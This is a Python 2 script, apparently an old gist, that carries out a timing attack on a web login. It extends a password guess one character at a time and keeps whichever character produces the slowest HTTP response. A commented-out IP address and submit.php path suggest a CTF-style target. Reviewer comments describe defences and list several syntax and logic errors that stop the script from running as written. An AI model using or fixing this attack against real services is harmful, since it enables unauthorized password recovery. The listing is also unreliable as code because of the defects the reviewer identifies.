Created
April 19, 2013 15:08
| # | |
| # Timing Attack Miscellaneous | |
| # | |
| import string | |
| import sys | |
| import re | |
| import time | |
| import threading | |
| import httplib | |
class Methods:
    """HTTP verb strings used as the request method."""
    Get, Post = 'GET', 'POST'
class TimingAttack(threading.Thread):
    ''' Thread that extends a password prefix one character at a time, using
    HTTP response times as the only signal.

    For each candidate character, run() sends the current prefix plus that
    character (padded with '_') to the target, times the request, and stores
    the elapsed time in self.data. alphabetOver() then keeps the candidate
    with the largest mean time as the new prefix. This presumably relies on
    the server checking the submitted value with an early-exit comparison,
    so that a longer correct prefix takes measurably longer to reject.

    Defensive notes: comparing secrets in constant time (for example
    hmac.compare_digest in Python) removes the signal this class measures.
    The traffic itself is a long run of failed submissions from one client
    that differ in a single character, which rate limiting, lockout and
    failed-login alerting are meant to catch.

    NOTE(review): written for Python 2 (print statements, httplib,
    string.lowercase). The listing does not parse as written; see the notes
    on __init__. Indentation was lost where this listing was published, so
    the nesting shown here is reconstructed.
    '''

    # NOTE(review): this signature is not valid Python as written: the
    # required parameters targethost and path follow a defaulted one, and
    # there is no comma between donestr='logged in' and alphabet=.
    def __init__(self,method=Methods.Get,targethost, path,
                 pwdlen=8,nsample=10,donestr='logged in'
                 alphabet=string.lowercase+string.digits+'_-!?=)(/&%$"!'):
        ''' Store the run parameters and reset the guessing state.

        method     -- HTTP method passed to conn.request() (default Methods.Get)
        targethost -- host handed to httplib.HTTPConnection
        path       -- request path; doRequest() applies `path % guess`, so it
                      is expected to contain one %s
        pwdlen     -- length that guesses are padded to in prepareGuess()
        nsample    -- modulus of the per-candidate sample counter
        donestr    -- substring of the response body that marks success
        alphabet   -- candidate characters, tried in order
        '''
        # NOTE(review): threading.Thread.__init__ is not called here.
        self.lenpad=pwdlen
        # NOTE(review): `lenpad` is not a name in this scope (NameError);
        # self.pad is not read anywhere else in the class.
        self.pad='X'*lenpad
        self.found=False
        self.targethost=targethost
        self.method=method
        self.path=path
        # Maps prefix+candidate -> list of elapsed times (filled in run()).
        self.data=dict()
        self.nsample=nsample
        # Both counters start at -1 so the first getCurrTry() call lands on
        # sample 0 of alphabet[0].
        self.currentSample=-1
        self.currenttryindex=-1
        self.alphabet=alphabet
        self.donestr=donestr
        # Prefix accepted so far, and the candidate character being timed.
        self.currentpwd=''
        self.currenttry=''

    def getCurrTry(self):
        ''' Obtain the current character

        Advances the sample counter modulo nsample. Each time it wraps to 0
        the alphabet index moves on (modulo the alphabet length). Returns the
        candidate character at the current index.
        '''
        self.currentSample = (self.currentSample+1)%self.nsample
        if self.currentSample == 0 :
            self.currenttryindex = (self.currenttryindex+1)%len(self.alphabet)
            # NOTE(review): assumed to sit inside the `if`, i.e. printed once
            # per new candidate; the original nesting is not recoverable.
            print "Trying: "+self.currentpwd+self.alphabet[self.currenttryindex]
        self.currenttry=self.alphabet[self.currenttryindex]
        return self.currenttry

    def prepareGuess(self):
        ''' Prepare the next guess

        Returns currentpwd + currenttry, right-padded with '_' up to lenpad
        characters (a longer string is returned unchanged).
        '''
        s= self.currentpwd + self.currenttry
        s+= '_'*(self.lenpad-len(s))
        return s

    def alphabetOver(self):
        ''' Pick the next password character if the alphabet index is on its
        last entry.

        Each key's sample list in self.data is replaced by its mean, the key
        with the largest mean becomes currentpwd, and self.data is emptied.
        Does nothing when the index is anywhere else.
        '''
        if self.currenttryindex == len(self.alphabet)-1:
            # Decide the next char of the pwd.
            # First calculate samples avg (not so statistically relevant)
            for ctry in self.data.keys():
                samples = self.data[ctry]
                tmp=sum(samples) / len(samples)
                # The mean is appended to a list that the next line replaces.
                samples.append(tmp)
                self.data[ctry]=tmp
            # Then pick the maximum avg (ugly)
            # Keys are prefix+candidate (see run()), so the winning key is
            # the whole new prefix.
            self.currentpwd = max(self.data, key = lambda w:self.data[w])
            # dict(list()) evaluates to an empty dict.
            self.data = dict(list())

    def createConnection(self):
        ''' Return a new httplib.HTTPConnection (plain HTTP) to targethost. '''
        conn = httplib.HTTPConnection(self.targethost)
        return conn

    def doRequest(self,conn,passwd='' ):
        ''' Send one request with passwd substituted into self.path and
        return the response object. '''
        conn.request(self.method, self.path%passwd)
        return conn.getresponse()

    def run(self):
        ''' Thread body: time one request per iteration until donestr
        appears in a response body. '''
        while ( not self.found ):
            self.getCurrTry()
            guess = self.prepareGuess()
            #print "Trying: "+guess
            # NOTE(review): a new connection is created for every request
            # and is never closed.
            conn = self.createConnection()
            # Wall-clock interval around sending the request and waiting
            # for getresponse() to return.
            time1 = time.time()
            res = self.doRequest(conn,guess)
            time2 = time.time()
            elapsed = time2-time1
            if self.donestr in res.read():
                self.found = True
                # NOTE(review): the body was already consumed by the read()
                # in the condition, so this second read() has nothing left
                # to print.
                print res.read()
                continue
            key = self.currentpwd+self.currenttry
            if key not in self.data:
                self.data[key] = list()
            self.data[key].append(elapsed)
            self.alphabetOver()
# Script entry point. Command line: <nsample> <targethost> <path with %s>.
# NOTE(review): `=` is an assignment, not a comparison, so this line is a
# SyntaxError as written.
if __name__ = "__main__":
    # "128.238.66.216""/eccbc87e4b5ce2fe28308fd9f2a7baf3/submit.php?pass="
    nsample= int( sys.argv[1] )
    targethost = sys.argv[2]
    tpath = sys.argv[3]
    print "Starting Timing Attack.. (note remenmber to use %s to mark guess position)"
    print "Target: GET %s %s " % (targethost,tpath)
    # NOTE(review): the % operator is missing here, so this calls a str
    # object instead of formatting it.
    print "%d samples per guess"(nsample)
    # NOTE(review): the nsample parsed from argv is not passed on; the
    # constructor receives the literal 10.
    ta = TimingAttack(targethost=targethost,path=tpath,
                      pwdlen=8,nsample=10)
    # start() runs TimingAttack.run() in a new thread; join() waits for it.
    ta.start()
    ta.join()